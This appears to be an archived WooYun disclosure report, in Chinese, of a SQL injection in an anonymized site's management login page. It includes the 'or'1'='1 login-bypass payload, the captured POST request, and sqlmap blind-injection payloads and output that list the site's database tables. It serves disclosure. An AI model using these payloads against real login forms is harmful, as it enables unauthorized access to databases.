乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-08: 细节已通知厂商并且等待厂商处理中 2015-09-10: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-20: 细节向核心白帽子及相关领域专家公开 2015-09-30: 细节向普通白帽子公开 2015-10-10: 细节向实习白帽子公开 2015-10-25: 细节向公众公开
简单的注入
网址:http://**.**.**.**/manager/index.htm
试验登陆,admin等弱口令无果,看看是否有sql注入尝试admin任意密码登陆,返回用户不存在
使用万能密码'or'1'='1,账号密码都这个,返回密码错误,说明语句成功,用户名字处存在注入
抓包
POST /manager/login.php HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/manager/index.htmCookie: PHPSESSID=dd7u5oltn870aggjpbpo1fden4Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 56loginid=%27or%271%27%3D%271&password=%27or%271%27%3D%271
丢到sqlmap里跑一下,真费劲了,延时注入,太慢了当前数据库
Place: POSTParameter: loginid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: loginid='or'1'%3D'1' AND 3567=3567 AND 'YDSI'='YDSI&password='or'1'%3D'1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: loginid='or'1'%3D'1' AND SLEEP(5) AND 'ZNVy'='ZNVy&password='or'1'%3D'1---[20:29:25] [INFO] testing MySQL[20:29:25] [INFO] confirming MySQL[20:29:29] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.0.55, PHP 5.3.4back-end DBMS: MySQL >= 5.0.0[20:29:29] [INFO] fetching current database[20:29:29] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[20:29:29] [INFO] retrieved:[20:29:39] [INFO] heuristics detected web page charset 'GB2312'dtcurrent database: 'dt'[20:30:26] [INFO] fetched data logged to text files under 'C:\Python27\sqlmapproject-sqlmap-b5060c0\output\**.**.**.**'
下面是跑出来的tables
Place: POSTParameter: loginid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: loginid='or'1'%3D'1' AND 3567=3567 AND 'YDSI'='YDSI&password='or'1'%3D'1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: loginid='or'1'%3D'1' AND SLEEP(5) AND 'ZNVy'='ZNVy&password='or'1'%3D'1---[20:31:41] [INFO] testing MySQL[20:31:41] [INFO] confirming MySQL[20:31:46] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.0.55, PHP 5.3.4back-end DBMS: MySQL >= 5.0.0[20:31:46] [INFO] fetching tables for database: 'dt'[20:31:46] [INFO] fetching number of tables for database 'dt'[20:31:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[20:31:46] [INFO] retrieved:[20:31:49] [INFO] heuristics detected web page charset 'GB2312'63[20:32:03] [INFO] retrieved: book[20:33:45] [INFO] retrieved: bookt[20:35:04] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the requesticket[20:36:19] [INFO] retrieved: hxadlist[20:39:21] [INFO] retrieved: hxchengji[20:41:47] [INFO] retrieved: hxdownload[20:44:17] [INFO] retrieved: hx[20:44:50] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the requestgaoji[20:46:31] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the requestan[20:47:11] [INFO] retrieved:[20:47:32] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the requesthxgaojian_copy[20:49:42] [INFO] retrieved: hxgroup[20:51:44] [INFO] retrieved: hxinfo[20:53:07] [INFO] retrieved: hxinfo_bao[20:54:38] [INFO] retrieved: hxinfo_cop[20:56:12] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the requesty[20:56:37] [INFO] retrieved: hxlink[20:58:19] [INFO] retrieved: hxluyong[21:00:07] [INFO] retrieved: hxme[21:01:11] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the requestnu[21:01:47] [INFO] retrieved: hxpeoplework[21:04:46] [INFO] retrieved: hxproduct[21:07:01] [INFO] retrieved: hxreadover[21:09:43] [INFO] retrieved: hxro
本来想进后台看看,太慢了,到此为止
找技术人员吧
危害等级:中
漏洞Rank:10
确认时间:2015-09-10 17:34
CNVD确认并复现所述情况,已经转由CNCERT下发给辽宁分中心,由其后续协调网站管理单位处置。
暂无